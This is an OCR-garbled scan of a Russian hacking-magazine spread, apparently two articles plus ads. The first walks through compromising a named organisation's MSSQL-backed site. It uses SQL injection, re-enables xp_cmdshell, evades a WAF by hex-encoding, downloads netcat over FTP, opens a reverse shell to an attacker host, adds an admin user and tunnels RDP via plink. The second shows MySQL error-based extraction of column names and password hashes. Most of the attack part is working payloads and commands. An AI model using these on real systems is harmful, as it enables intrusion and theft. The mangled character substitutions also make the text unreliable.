По адресу паФи.огдЯетр[аФ.сФп?5есбоп=ѴѴЬаі із ап 
РСЦ 8Летр[аФ=/СопФп1:Мападеітіеп1:/НТМБРІ5р1.ау. 
сФп&Сопіепі1Р=3842 мы имеем классическую инъекцию 
ЗОБ-запросов. При подстановке кавычки получим невероятно 
информативный выводошибки СоШРизюп, в которыйтранс- 
лируется ошибка ЗОБ — [МіспозоШКЮВС ЗОБ Зегѵег Огіѵег] 
[ЗОБ Зегѵег] Біпе 4: Іпсоггесізупіах пеаг. Очевидно, что дело 
придется иметьсЗОБ-сервером от мелкомягких. 

Разведку начнем проводить в направлении определения 
параметров БД и самого сервера. Для этого прощупаем скрипт 
запросом вида 

паНси . огд/ТешрІаЪе . с&п?ЗесДіопЩШаЪ_із_ап_ 
РСЦ_&Тетр 1 аС е= / СопС епШападетепС / НТМЬБі зр 1 ау . 
сНт&СопЦепЦІБ=3 8427+ап<і+1=0+ог+1= ( зеІесЦ+сЬаг ( 
108) %2ЬсазС (0x74 6 8 6973 6973 73 657 06172 6174 6Р72+а 
з+ѵагсЬаг (200) ) %2ЬсазС (геріасе (©©ѵегзіоп, сЬаг ( 
10 ) , сііаг (32 ) ) +аз+ѵагс1іаг (2 00 ) ) %2ЬсазЪ ( 0x746869 
73697373657061726174бР72+аз+ѵагсЬаг (200) ) %2Ьса 
зС (с!Ъ_пате ( ) +аз+ѵагсЪ.аг (200) ) %2ЬсазЪ (0x7468697 
36973736570617261746Р72 +аз + ѵагсТіаг (200) ) %2Ьсаз 
С (зузСет_изег+аз+ѵагсЬ.аг (200) ) %2ЬсазС (0x746869 
736973736570617261746Р7 2 +аз + ѵагсЪах (200) ) %2Ьса 
зС (@@зегѵегпате+аз+ѵагсЬ.аг (2 00) ) %2ЬсазС (0x746 
8 6973 6973 73 657 06172 6174 бР72+аз+ѵагс1іаг (2 00 ) ) %2 
ЬсЬаг ( 108 ) ) 

Все сложилось на редкость удач но — сработала ошибка на 
преобразованиетипов, и в результате получена идентифика- 
ционная информация: 

• сервер — МісгозоШ ЗС>Ь Зегѵег 2000 — 8.00.2 039 
(ІпСеІ Х86) Мау 3 2005 23:18:38 СоругідБШ (с) 
1988-2003 МісгозоШ СогрогаСіоп РпСегргізе 
ЕсІіЦіоп оп Мпсіомз ОТ 5 . 0 (Виіісі 2195 : Зегѵісе 
Раск 4) ; 

• пользователь — за. 

Пользователь за! Ну, ни фига себе. В одном из изи-хаковя пи- 
сал о процедуре хр_стбзбеи (вернее, о способе ее активации 
в 50Б5егѵег2005], которая предоставляет возможность рабо- 
ты с ОС от имени учетки ЗОБ-сервера (в большинстве случаев 
— зузФппІ.Тамжея писал, что приложения, работающие от за, 
нетакужи редки. Не поверил тогда — убедись сейчас :). 
Послетого, какбыло получено имяучетки, все мое внимание 
сосредоточилось вокруг процедуры хр_стбзбеи. 

ШАГ 2. ПОДГОТОВИТЕЛЬНЫЕ 
ДЕЙСТВИЯ 

Возвращаясь к изи-хаку, напомню, что процедура хр_стбзбе[[ 
в2005сервере поумолчанию отключена, ноее можно 
включить, имея привилегии зузабтіп. Для этого нужно лишь 
воспользоваться процедурой зр_сопРдиге. Мы же работаем 
с сервером 2000, в котором этого функционала нет. Однако 



хр_стбзбе[[ может быть отключена администратором с 
помощью процедуры зрщФорехФпсІесІргос. Но раз она может 
быть отключена, значит, мы можем ее и включить. Разницы ни- 
какой нет— разрабы накосячили в 2000, накосячили и потом! 
Честно скажу, вначале я не думал, что процедура недоступна. 

Я долго и упорно составлял разные зловещие запросы, пока 
не додумался ее включить. Для этого необходимо применить 
процедуру зр_асФех1:епсІесІргос и дополнительно знать назва- 
ние библиотеки, которая эту самую хр_стбзбеи реализует. Ты 
знаешь?Я — да : хрІод70.сІЦ. Дабы незахламлятьлюбимый 
журнал, далее в примерах запросов я буду опускать путь до 
уязвимого параметра. 

Сперва я попробовал в лоб: 

; ехес тазСег . . зр_асі(іехЦеп(іесіргос ' хр_ 
стсізітеіі ' , 1 хр1од7 0 . сЗ.11 ' -- . 

Результат за проса поставил меня втупик.таккак, собственно, 
никакого результата и не было. Не было вообще ничего, сервер 
просто сбросил соединение. «Вотте раз», — подумал я. «Вот 
тебе и два», — ответил сервер при попытке обновить страницу. 
Видимо, был задействован фаер науровне приложений, 
который не пропускал строку хр_стбзбеи в запросе. Запрос 
бы л тр и в иа л ьн ы й , та к что достаточ но б ы л о п росто п редста в ить 
строки в шестнадцатеричной кодировке: 

; ехес гпазкег. . зр_асМехЦепсіес1ргос0х787 05:Е63 6с16 
47368656с6с,0х78706с616737302е646с6с--. 

Появиласьстраничка без всякихошибок. Это еще ни о чем не 
говорило, так что я решил продублировать запрос и дико обра- 
довался: сервер выплюнул ошибку, что объект уже зарегист- 
рирован. Обрати внимание: при вызове зр_аббех1:епбебргос 
я использовал контекст БД та зіе г. То же самое я буду делать и 
при вызове хр_стбзбеи. Советую поступать также, в против- 
ном случае — пеняй на себя. 

ШАГЗ. ОБЕСПЕЧИВАЕМ КОНТРОЛЬ 
МЕСТНОСТИ 

Зачетная вещь - хр_стбзбеи, но работать с ней доста- 
точно сложно, что и отпугивает новичков. В результате, 
они опускаются до банальных вещей, так и не добиваясь 
серьезных результатов. Сложность в том, что, инъектируя 
команду ОС, ты не увидишь никакого результата. Факти- 
чески, приходится работать вслепую. Нет никакого вывода 
команды, и ты даже не поймешь, выполнилась ли она 
вообще, и не ошибся литы в синтаксисе. Но это на поверх- 
ности. А если подумать и вкурить в МЗБЫ, можно увидеть, 
что ехесіке прекрасно уживается с іпзегі; и результат вы- 
полнения можно занести втаблицу. Прочитать же данные 
из таблицы, имея принта бел ьную инъекцию, думаю, труда 
не составит. 

Таким образом, для обеспечения вывода результата будем 
использовать конструкции вида: 

іпзегС іпЦо Іоо ехесиЪе хр_стсіз1іе11 '<оз_ 
сотшап(і> ' , 

Где Фо — таблица с единственным столбцом типа ѵагсбаг. 
Такую таблицу надо создать с помощью команды: 

; сгеаЪе ІаЫе 1оо(геЪ ѵагскаг ( 2 00 ) ) -- . 

Для контроля выполнения команд необходимо получать 
данные из таблицы Фо. В примитивном варианте доста- 
точно смотреть, не изменилось л и количество записей, 




НТТР://ѴѴѴШ 
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С уважением отно- 
сись к документации. 
Большинство про- 
блем, возникающих 
при проведении инъ- 
екций на ЗОБ Зегѵег, 
решаются после 
обращения к МЗБЫ: 
тзсФ.птсгозоІТ. 
со т/е п- из/и Ь гагу/ 
тзі 87389.азрх . 
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для чего я держал в лисе отдельную вкладку с 
заряженной инъекцией: 

апб+1=0+ог+1= (зеіесі + сііаг (108) %2Ъс 
азі ( 0x74 6 8 697 3697 373 657 06172 6174 6Р 
72+аз+ѵагсЬаг (200 ) ) %2Ъсаз1 (соипі ( * 

) +аз+ѵагс!іаг (200) ) %2Ъсаз1 ( 0x746869 
73 697373 657 06172 61746Р72+аз+ѵагс1іа 
г (200 ) ) %2Ьс1іаг ( 10 8 ) +1гот+1оо) -- . 

ШАГ 4. ОБЕСПЕЧИВАЕМ 
СКРЫТНОСТЬ 

Весело открыв очередную банку кефира, я 
инъектировал код: 

; іпзегі іпіо Іо о ехесиіе тазіег. . 
хр_стс1зЪ.е11 ' ірсопіід ' -- 

- и обломался. Все правильно, я забыл про 
ѴѴАР, который нужно как-то обойти. Я попы- 
тался заменить все строки на их шестнадца- 
теричные представления, но из затеи ничего 
не получилось. Не получилось, потому что 
строка тазіег.. хр_стсІ5Ьеи здесь выступала не 
в качестве параметра, а в качестве названия 
функции. «Воттебе и три», — отвечал ѴѴАР на 
все мои извращенные попытки. 

Я полез в документацию и вскоре увидел, что 
ехесиіе может принимать название функции 
в виде строки типа пѵагсбаг. При подстановке 
же шестнадцатеричного значения я передавал 
ѵагсбаг. Сервер, тихо посмеиваясь, с честным 
видом выдавал страницы без всякого намека 
на ошибки. Для реализации задуманного сле- 
довало конвертить строку тазіег. хр_стсІ5НеІІ 
в пѵагсбаг перед передачей ее на исполнение. 
После недолгих мыканий родился следующий 
шаблон: 

; бесіаге @ѵ аз ѵагсЬаг (2048) 
сіесіаге @п аз пѵагсііаг (2048) зеі @ѵ = 
0x6(16173 7 4 65722е2е7 87 05 163 6(16473 6 8 
656с6с зеі @п = саз!(@ѵ аз пѵагсііаг) 
зеі @ѵ = <сотшап(1_іп_]тех> іпзегі 
іпіо іоо ехесиіе @п @ѵ--, 
где 0x6(16173 7 4 6572 2е2е7 87 0 5 163 6(1647 



368656с6с — закодированное значение 
тазіег. . хр_стсІзЪ.е11 * 

Проверим на примере того же ірсопРід : 

; (Іесіаге @ѵ аз ѵагсііаг (2048) 

(Іесіаге @п аз пѵагсііаг (2048) зеі @ѵ = 
0х6(161737 465722е2е7 87 05163 6(16473 68 
656с6с зеі @п = сазі(@ѵ аз пѵагсііаг) 
зеі @ѵ = 0х697063616е666967 іпзегі 
іпіо Іоо ехесиіе @п @ѵ--. 

Смотрим, сколько записей в Іоо ; 10 — то, что 
надо. 

ШАГ 5. СОСТАВЛЯЕМ 
ПЛАН ДЕЙСТВИЙ 

Итак, я получил способ выполнения команд в 
обход ѴѴАР. Теперь нужно было покреативить 
и составить план дальнейших действий. 
Результаты сканирования показали, что 
пробиться к серверу напрямую по НОР не 
удастся. Наученный опытом прошлой схватки я 
набросал алгоритм: 



• каким-то образом закинуть на сервак 
пеісаі и рііпк (естественно, волшеб- 
ной версии) 

• поднять на дедике пс в режиме про- 
слушивания 

• запустить на серваке пс в режиме 
коннекта и проброса командной строки 

• создать и добавить нужного пользо- 
вателя в нужную группу 

• поднять на дедике 88Н-сервер 

• осуществить реверс-коннект на де- 
дик с правильным маппингом портов 

• на дедике подключиться по КБР к 
Іосаііюзі : 33 90 и получить доступ к 
удаленному рабочему столу 

• ввести логин и пароль нужного поль- 
зователя 

• отключиться от сервера и написать 
статью в ЗС 

ШАГ6. ВНЕДРЕНИЕ АГЕНТА 

Первым делом следовало залить нужные 
файлы на сервер. В прошлый раз был доступ к 
Ир, но здесьтакого счастья мне не привалило. 



X 



А ЗАЛИВКАПОРТР 

Получив возможность исполнять команды операционной системы и запускать собственные 
бинарники, следует позаботиться о способе заливки файлов на целевую систему. В *піх-средах 
это решается просто, так как в большинстве из них по умолчанию доступен ѵѵдеі, а если и нет, то 
не составит труда его доустановить. В винде ѵѵдеГа нет, а для установки софта нужно сначала 
залить дистрибутив. Извечная проблема курицы и яйца. 

К счастью, в штатной поставке есть РТР-клиент, позволяющий работать с внешними скриптами. 
Для скачки файлов нужно наполнить текстовый файл РТР-командами и скормить его клиенту: 

Пр.ехе -і -п -ѵ -5:<5сгір1_ра1;Ь> 

При создании скрипта в большинстве случаев достаточно следующих РТР-команд: 

• ореп <зегѵег> <рог1> — устанавливает соединение суказаннымРТР-сервером; 

• и5ег<и5егпате> [раззѵѵогсі] — позволяетуказать учетные данные для аутентификации; 

• Ьіпагу — устанавливает двоичный режим передачи; 

• деі <гето1:е-б1е> [Іосаі-Іііе] — копируетудаленный файл на локальную систему; 

• циі! — закрывает РТР-сессию. 

I 
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ФИЛЬТРАЦИЯ В ДЕЙСТВИИ 
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ОПРЕДЕЛЯЕМ КОЛИЧЕСТВО СТРОК В ВЫВОДЕ КОМАНДЫ 



Пришлосьзадуматься над использованием 
стандартных средств ОС, доступных из команд- 
ной строки и позволяющих скачивать файлы по 
сети. Немного подумай... — ну, конечно, это Ир. 
ехе. Продолжая тему сиквела, в качестве Нр- 
сервера я цинично использовал ізт.ѵѵз:. 

Так как интерактивной сессии не было, следо- 
вало составить скрипте командами и скормить 
его клиенту. Синтаксис скрипта для Нр-клиента 
очень прост — в каждой строчке по отдельной 
команде. Для начала я набросал команды по 
созданию скриптов. Выполнять каждую по от- 
дельности не хотелось, и я использовал режим 
последовательного выполнения команд стб. 
ехе с использованием амперсандов. Так, для 
скачивания пс.ехе нужно было выполнить: 

тксііг %ТЕМР%\кезк && есТю ореп 
ккр2 . гсПпек 21 » %ТЕМР%\кезк\ 
кезк.кхк && еекю ІЛЗЕК ізт.ѵѵз .ргосі. 



сосіе заШДІХкагыШРигРЬ » %ТЕМР%\ 
кезк\кезк . кхк && еекю Ыпагу » 
%ТЕМР%\кезк\кезк . кхк && есТю дек 
коо1з\пс.ехе %ТЕМР%\кезк\пс . ехе » 
%ТЕМР%\кезк\кезк . кхк && еекю диік » 
%ТЕМР%\кезк\кезк . кхк && ккр.ехе -і 
-п -ѵ -з : %ТЕМР%\кезк\кезк . кхк . 

По выполнении этой команды в директории 
% Т Е М Р %\1; е 5І должен появиться файл пс.ехе. 
После кодирования и подстановки в шаблон 
был инъектирован код: 

; сіесіаге @ѵ аз ѵагсЬаг ( 2 048 ) 
сіесіаге @п аз пѵагскаг (2048) зек @ѵ = 
0x6(1617374 65722е2е7 87 05 кбЗ 6(16473 68 
656с6с зек @п = сазк(@ѵ аз пѵагскаг) 
зек @ѵ = 0х6с16Ь64 6 97 2 2 02554454(15025 
5с5с74657374202626206563686к206к70 
65 6е2 0 66747 0322е72642е6е65742 03231 



2 03е3е2 02 554454(1502 55с5с746573745с 
5с7 4657 3742е747 8742 0262620656368612 
0555345522 0697 3 6(12е77732е7 072 6к642 
ебЗ 6к64 652 0 6а6157 6с55586Ь615а4е4е5 
7 467 57 а4 6622 03 еЗе2 02 554454(15 02 55с5 
с746573745с5с746573742е7 4787420262 
6206563686к2062696е617279203е3е202 
554454(1502 55с5с7 4657 3745с5с7 465737 
42е747 8742 02 62 62 06563 686к2 067 65742 
074 6к6к6с735с5с6е632е657 8652 025544 
54(1502 55с5с74657 3745с5с6е632е657 86 
52 03е3е2 02 554454(1502 55с5с7465737 45 
с5с746573742е747874202626206563686 
к2 07175 69742 03е3е2 02 554454(15 02 55с5 
с746573745с5с7 46573742 е7 4787420262 
62 0 66747 02е657 8652 02(1692 02(16е2 02(17 
62 02(173 За2 554454(1502 55с5с7465737 45 
с5с746573742е747874 іпзегк іпко коо 
ехесике @п @ѵ--. 

Для проверки выполняем сііг %1ет р%\ке5І: 

; сіесіаге @ѵ аз ѵагскаг (2 048 ) 
йесіаге @п аз пѵагскаг ( 2 048 ) зек @ѵ = 
0х6(1617 37465722е2е7 87 05к63 6(16473 68 
656с6с зек @п = сазк(@ѵ аз пѵагскаг) 
зек @ѵ = 0х6970636к6е666967 іпзегк 
іпко коо ехесике @п @ѵ--. 

Все ОК, пс.ехе на месте. Точнотакже заливаем 
рііпк.ехе (можно было и в один скрипт засунуть], 
только директорию создаватьуже не надо. 

ШАГ7. ЗАКРЕПЛЕНИЕ 

Далее нужно за пустить та кие команды, какие! 
изеги пе! Іосаідгоир. Можно все делать через 
инъекцию, но при наличии пеісаіэтоуже не имеет 
смысла. Поэтому на дедике я запустил пс.ехе в 
режиме прослушивания порта 1 234: 

пс.ехе -1 -р 1234. 

Для реверс коннекта к деду и проброса шелла 
следовало выполнить команду: 

%кетр%\кезк\пс . ехе тОгО . сіесі . сот 
123 4 -е сш(1 

- со стороны сервака. После кодирования 
имеем следующий инъект: 

; сіесіаге @ѵ аз ѵагскаг (2 048 ) 
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сіесіаге @п аз пѵагсЬаг ( 2 048 ) зек @ѵ = 0х6с161737465722е 
2е787051636с1647368656с6с зек @п = сазк(@ѵ аз пѵагскаг) 
зек @ѵ = 0x2 574 656(37 0255с5с746573745с5с6еб32е657 8652 06 
сіЗ 0723 02е6465 642е63 6^6(32 03 1323 3342 02(3652 063 6(364 іпзегк 
іпко коо ехесике @п @ѵ- 

Все прошло как нельзя гладко, и в консоли деда я увидел шелл подо- 
пытного сервера. Воспользовавшись консолью, я активировал юзера 
зиррогІ_388945аО и добавил его в группу администраторов: 

пек изег зиррогк_3 88945а0 /аскіѵе:уез шОгОразз 
пек Іосаідгоир а(ЗтіпізДгаДогз зиррогД_388945а0 /а (3(3. 

ШАГ 8. АТАКА 

Глотнув еще кефира, я запустил на деде 55Н-сервер. На автомате в консоли 
появилась команда для подключения по55Н. Классика проникновения: 



X 



Д ПОИСКИНЪЕКЦИЙ 

Простейший способ определения уязвимых параметров заключа- 
ется в подстановке кавычекв передаваемые значения. Собст- 
венно, таким образом и были обнаружены уязвимости ЫАРСС. 

Не стоитзацикливаться исключительно на кавычках. Во-первых, 
ошибки могут просто не выводиться. В этом случае при подста- 
новке кавычки ты тупо ничего неувидишь. Во-вторых, кавычки 
могутэкранироваться. Ошибки никакой не произойдет, а инъ- 
екция, тем не менее, может присутствовать. Так, например, при 
переполнении целочисленных параметров кавычки и вовсе не 
нужны. Наконец, параметр может быть уязвим к слепым инъекци- 
ям. Подставлять кавычку здесь — это какядерной боеголовкой по 
муравейнику. Поэтому помимо кавычекя повсеместно использую 
конструкции «апсі 1 = 1 — » и «апб 1=0--», добавляя их косновному 
значению параметра в различных вариациях. Стопроцентной 
гарантии нет, но в большинстве случаев при наличии инъекции 
сервер будет возвращать разные результаты. Главное убедиться, 
что основное значение параметра обеспечивает возврат каких- 
нибудьданных. Отличие в результатахъ можешьувидеть на глаз. 
Но можешь и неувидеть, если оно незначительно или не выво- 
дится браузером. В любом случае стоит заглядывать в НТМ-коды 
страниц и сравнивать их между собой. Вручную делать это крайне 
неэффективно, поэтому советую задуматься о разработке средств 
автоматизации. 

I 



%Дешр%\ДезД\р1іпк. ехе -пс шОгО . сіесі. сот: 22 -ЬаДсЬ -рот 
<разз>-К 33 90:127.0.0.1:33 89 -Ь 3 3 90 : 127 . 0 . 0 . 1 : 33 9 0 -1 
<изегпате> -аико_зкоге_кеу_іп_сас1іе т0г0 . сіесі. сот 

Сервак в наших руках, — можно подключаться на 127.0.0.1 :3990. 
После ввода логинаипароляя оказался на территории врага. 
СУБД работала в режиме ѴѴіпсІоѵѵз АиіЬепѣісаІіоп, так что получить 
доступ ко всем БД и слить дампы не составляло труда. Развитие 
успеха я оставлю за кадром, предлагая включить фантазию. 

ТЯЖЕЛО ВУЧЕНИИ 

Окучивая ЫАРСН, я столкнулся со многими, казалось, непреодо- 
лимыми трудностями. Это и активация хр_стсІ5ЬеЦ, и обход ѴѴАР, 
и зал ив ка файлов, и, конечно, уже классический обход файра с 
помощью реверс-коннекта по 55Н. Однако суть не в этом. 

Прелесть в том, что это не уникальный баг, а типовая ситуация, и 
все вышеописанное следует расценивать как методику. Имея в ру- 
каве такие козыри, как инъекция и доступ с правами за, ты можешь 
не бояться за исход партии, главное — умел оими воспользоваться. 
Все описанные действия были совершены под музыку Бетховена. 
Слушай классику и будь счастлив. з-ц 



Совет №2. 

Раз в два часа 
отрывайся от работы 
и устраивайте прогулку! 

Если возможно, гуляй по 5-10 
минут на улице. Но можешь 
ходить и в офисе. А чтобы все 
думали не то, что ты бездельни- 
чаешь (они ведь не знают про 
«Календарь Здоровья»!), а что у 
тебя важные дела по работе — 
возьми в руки стопку исписан- 
ных бумаг. Это работает! 
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Игры меняются, 
датѳіапсііи остается! 



реклама 



взлом 
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Шеп ап аккаскег ехесикез ЗОЬ Іп] ескіогі аккаскз 
зотекітез кЬ.е зегѵег гезропсіз мікЬ. еггог шеззадез 
кгот кЬ.е сІакаЪазе зегѵег сошріаіпіпд ші: кке ЗОЬ 
Оиегу ' з зупках із іпсоггеск . Вііпсі ЗОЬ іп^ескіоп 
із ісіепкісаі Во погшаі ЗОЬ Іпбескіоп ехсерк 
ккак мке п ап аккаскег аккетркз Во ехрІоіВ ап 
аррІісаВіоп гаккег ккеп деВВіпд а изеВиІ еггог 
шеззаде ккеу деВ а депегіс раде зресіВіес! Ьу 
кке сіеѵеіорег іпзкеасі. ТЫз шакез ехріоівіпд а 
роВепВіаІ 8СЩ Іп^есВіоп аВВаск тоге сііккісиік ЪиВ 
поВ ітроззіЫе. Ап аВВаскег сап зВіІІ зВеаІ сіака 
Ьу азкіпд а зегіез оВ Тгие апЬ Еаізе диезВіопз 
кЪгоидЪ. зді зВаВешепВз. 

Аскіікіопаі іпВогтаВіоп оп ЗОЬ іп^есВіоІшИ 
іпсІиЬіпд изеВиІ агВісІез апЬ Ііпкз сап Ье ВоипЬ 
аВ оиг ЗОЬ Іпбескіоп раде Ъеіом ЬВВр: / /ѵют. 
сдізесигіВу . сот/ЬеѵеІортепВ/зд! . зЬВтІ^И 




ДОБИВАЕМ 

5 СІІ_ 



Новейшие способы раб 



оты с инъекциями 



Не прошло и трех дней после сдачи моей прошлой статьи, как в голове 



родилась совершенно новая и куда более эффективная методика 
работы с Вііпсі 5СП_ Іщесбоп. Если ты помнишь, я рассказывал о том, 
как существенно уменьшить количество запросов к серверу 
при работе с уязвимостями такого рода. Сегодня я покажу поистине 
революционные приемы инъектирования. Аты внимательно слушай 
и конспектируй. 



РАЗБИРАЕМСЯ 
С ИМЕНАМИ СТОЛБЦОВ 

Начались мои исследования с попытки решить 
вторую основную проблему тех, кто работаете 
инъекциями в Му50І_. Она заключается в не- 
возможности получить имена таблиц и столб- 
цов в Му50І_4-й ветки, не прибегая к полному 
перебору. 

Насколько нам всем известно, в этой ветке 
н а ч и сто отсутствует с и сте м н а я та б л и ца 
ІМР0РМАТІ0І\І_5СНЕМА.ІаЫе5, и данные о 
таблицах, хранящихся в базе данных, нигде в 
виде, доступном для чтения, не содержатся. 

Эта особенность доставляет массу неудобств. 
Изначально задумка состояла втом, чтобы 
попытаться найти такую ошибку выполнения 
50І_-запроса, в которой выводится какая-ни- 
будь информация о текущей таблице. Немного 



пошерсти в документацию, обнаруживаем 
ошибку: 

Еггог: 1060 ЗОЬЗТАТЕ: 42321 (ЕК_ 

БІІР-ЕІЕЬБЕАМЕ ) 

Меззаде: Биріісаке соіишп пате ' %з ' 

Забиваем текст в поисковики видим: эту 
ошибку можно получить, если задать уже 
существующее имя колонки в оператор АІ_ТЕП 
ТАВЕЕ, или если неправильно воспользоваться 
оператором ЭО I N . Варианте АІ_ТЕП ТАВІ_Е не 
подходит, так как его невозможно использовать 
в 5ЕІ_ЕСТ-запросе. Попробуем варианте ЭОІ N . 
Для начала выясним, когда именно эта ошибка 
возникает в 5ЕІ_ЕСТ-запросе. Посмотрев доку- 
ментацию, выясняем, что эта ошибка возникает 
тогда, когда ты при помощи оператора 5ЕІ_ЕСТ 



пытаешься получить имя какой-нибудь колонки 
(кпримеру, іб] и тут оказывается, что колонок 
с именем іб несколько. Оператор 5ЕІ_ЕСТ 
теряется и выплевываетошибку. Мол, колонок 
с именем ' іб' несколько, и он не знает, какая 
именнотебе нужна. 

Теперь вспомним о том, что оператор б О I N ис- 
пользуется для связывания двух таблиц между 
собой. Запускаем запрос с использованием 
б О I N : 

тузд1> зеіеск * кгот изегз боіп пемз; 



I ісі I пате I раззмсі I із_асЗтіп | ісі 
I кікіе I (баке I 



I 1 I Іѵап | раззмогсіі | 1 I 1 I 



► 058 
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№іеп ап аккаскег ехесикез ЗОБ Іп^ескіоп аккаскз 
зотекітез кке зегѵег гезропбз мікЪ. еггог шеззадез 




кезкі I 22-12-2009 I 






1 гом іп зек (0.00 зес) 

И видим, что он вернул нам содержимое таблиц ' изегз' и ' пеѵѵз' 
в виде одной таблицы, причем имена колонок в таблицах остались 
прежними. То есть, у нас в выводимом результате — две колонки 
с именем 'ісГ. Попробуем получить значение поля ’ісГ из таблицы, 
составленной выше. Не забываем о том, что для сложных запросов 
Му50І_ требует указан и я а л иа сов для каждой таблицы, участвующей 
в запросе. 

тузд1> зеіеск * кгот (зеіеск * кгот изегз аз а ^оіп пемз 
аз Ь) аз с; 

ЕШЮК 1060 (42321) : Биріісаке соіитп пате ' ісН 



А ЬЕЕТ ЦОШ В БЗШС ( С1 , С2 , СЗ , . . . ) 
семантически идентично выражению (Ж, например: 

А . С1=В . С1 АКБ А. С2=В . С2 АШ А . СЗ =В . СЗ , . . . 

То есть, объединивтаблицы ' пеѵѵз' и ' изегз' и используя оператор 
И5І N0(1 с параметром 1 ісі ' , мы получим результирующую та блицу, в 
которой столбец с именем 'ісГ будет присутствоватьтолько один раз. 
Пробуем: 

тузд1> зеіеск * кгот изегз а ^оіп пемз Ь ІІЗШС(ісі) ; 



I ісі | пате I раззмсі I із_асітіп | кікіе I баке 



I 1 I Іѵап I раззмогсИ I 1 I кезкі I 22-12-2009 I 



Отлично! Получили то, что хотели, осталось подумать, как при помощи 
подобного запроса получить имена всех столбцов, к примеру, таблицы 
'изегз' . Джойним ее саму с собой: 

тузд1> зеіеск * кгот (зеіеск * кгот изегз аз а ^оіп изегз 
аз Ь) аз с; 

ЕККОК 1060 (42321) : Биріісаке соіитп пате 'ісН 

На выходе получаем имя первого столбца таблицы. Думаем, как полу- 
чить остальные. Снова смотрим в документацию и находим оператор 
И5І N0, который используется для указания списка столбцов, которые 
присутствуют в обеихтаблицах: 

ІІЗІЫС (со1итп_1ізк) служит для указания списка столб- 
цов, которые должны существовать в обеих таблицах. Такое 
выражение 113 ШС, как: 



1 гом іп зек (0.00 зес) 

Действительно, видимтолько один столбецс именем 'ісГ, а значити 
попытка получить столбец с именем 'ісГ из этой таблицы никакой ошибки 
не спровоцирует. 

Применим этот оператор для получения имен остальных полей изтабли- 
цы 'изегз' , с учетом того, что имя 1 ісі 1 мы уже знаем: 

тузд1> зеіеск * кгот (зеіеск * кгот изегз а зоіп изегз Ь 
изіпд ( ісі) ) с ; 

ЕКВ.ОК 1060 (42321) : Биріісаке соіитп пате ’ пате ’ 

Ага, узнали еще одно имя столбца — 'пате', пробуем дальше: 

тузд!> зеіеск * кгот (зеіеск * кгот изегз а ^оіп изегз Ь 
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СПИСОК В03М0ЖНЫХ0ШИБ0К 
50І.-ЗАПР0С0В МОЖЕТ СКАЗАТЬ 
О МНОГОМ 



изіпд(іс1, паше) ) с; 

ЕККОК 1060 (42521) : БирІісаСе соіигпп паше 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 






ПНТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

Ьгит.апбсЬаКги/ 
ІбгеасІ43966.Ыпп[ — 



все о 50И Іпіесііоп. 
беѵ.тузді.сот/сіос 
— документация по 
Му5С11_. 

Іюгипп.апІісЬаКги/ 
ІбгеасІІ 19047.ЫтІ 



— методы быстрой 
работы со слепыми 
инъекциями. 




> ІПІО 

Эти методы можно 
использовать 
и в обычных инъекци- 
ях. При их использо- 
вании не придется 
подбирать количество 
колонок в запросе. 



* раззмсі ' 

Узнаем имя третьего столбца. И так, один за другим, выявля- 
ем имена столбцов в этойтаблице. В конце, когда выясним 
все имена, ошибки не будет, и запрос выполнится успешно. 

тузд1> зеІесС * ігош (зеІесС * 1: гот изегз а зоіп 
изегз Ь изіпд ( ісі, пате, раззмсі, із_асітіп) ) с ; 



+ 

ісі 1 паше 


- + 

1 раззмсі 1 


— + 

із_ас!тіп | 


1 1 Іѵап | 


раззмогсіі 


1 1 1 


+ 


- + 


+ 



1 гом іп зеЪ (0.00 зес) 



Делаем вывод, что в таблице ' изегз' присутствуют столбцы 
’ісГ, 'пате', 'раззѵѵсГ, , І5_абтіп'. Вроде бы все хорошо, но... 
метод не срабатывает на Му50І_4-й версии. Выясняет- 
ся, что в четвертой версии при таком запросе возникает 
совершенно другая ошибка. Следовательно, все описанное 
выше может использоваться, только если по каким-ли- 
бо причинам мы не можем воспользоваться таблицей 
ІІ\ІЕ0ПМАТІ0І\І_5СНЕМА.1:аЫе5 в пятой или шестой версиях 
Му5С11_. 

ВЗГЛЯД ПОД ДРУГИМ УГЛОМ 

Возможность получать имена столбцов без использования 
ІІ\ІР0ПМАТІ0І\І_5СНЕМА — это, конечно, возможность по- 
лезная, нота кая необходимость возникает довольно редко. 
Разве что в слепых 50Е-инъекциях, с возможностью выво- 
да ошибки, где стандартный процесс получения значений 
за ни мает достаточно много времени. А тут пара запросов 

— и все нужные значения получены. Хотелось бы выжать из 
этой ошибки большее... 

Недавно мне в аську постучался щкезіег (Джок, большой 
тебе привет!) и предложил следующую идею: «А почему бы 
не попробовать выводитьзначение какого-либо поля из 
базы данных в тексте ошибки целиком, неприбегаяк клас- 
сическому использованию тоге 1 гоѵѵ?». «Идея отличная», 

— согласился я. 

Он начал исследовать варианты составления запросов с 
использованием ОВРЕВ ВУ, которые при неправильном 
значении сортируемого поля выводятошибку: 




тузд1> зеІесЪ * Ргош изегз огсіег Ьу Іаіа; 

ЕККОК. 1054 (42822): Шікпомп соіитп 'Іаіа' іп 
' огсіег сіаизе' 

Я же вспомнил о методе вывода имен колонокс исполь- 
зованием ЭОІ N . Через некоторое время мы оба пришли к 
тому, что нужно найти какой-нибудь способ заставить базу 
данных восприниматьзначение поля какимя колонки. 

Это обуславливается тем, что запросы, которые ругаются 
на неправильное имя колонки, есть, а запросов, которые 
ругаются на неправильные данные втаблице и при этом их 
выводят, — нет. 

Отлично, задача поставлена, зарываемся в документацию. 
Находим интересную функцию в разделе «Мізсеііапеоиз 
Еипсбопз», с пометкой «іюг і піегпа I изе опіу». Функция 
называется І\ІАМЕ_С0І\ІЗТ(). Используется так: І\ІАМЕ_ 
С0І\І5Т(пате,ѵаІие]. Результатом работы станетзначение 
'ѵаіие' в столбце с именем 'пате': 



тузд1> зеІесЪ пате_сопзЪ ( ' ТезЪ ' , 111); 



I ТезЪ I 



I 111 | 



1 гом іп зек (0.00 зес) 

Как разто, что нужно! Проверим, возможно ли вместо зна- 
чения 'ѵаіие' выполнить какой-нибудь запрос. Достанем, к 
примеру, поле 'раззбазб' изтаблицы 'изегз': 



тузд1> зеІесЪ пате_сопзк ( (зеІесЪ раззказЪ. ігот 
изегз ѵіЬеге ісІ=1) , 111) ; 



I 18с180с1еіб9(1с3ее86с53 81219е4с5с80 I 



111 | 



1 гом іп зек (0.00 зес)1 гом іп зек (0.03 зес) 

Отлично, все сработало, как надо — в имени столбца 
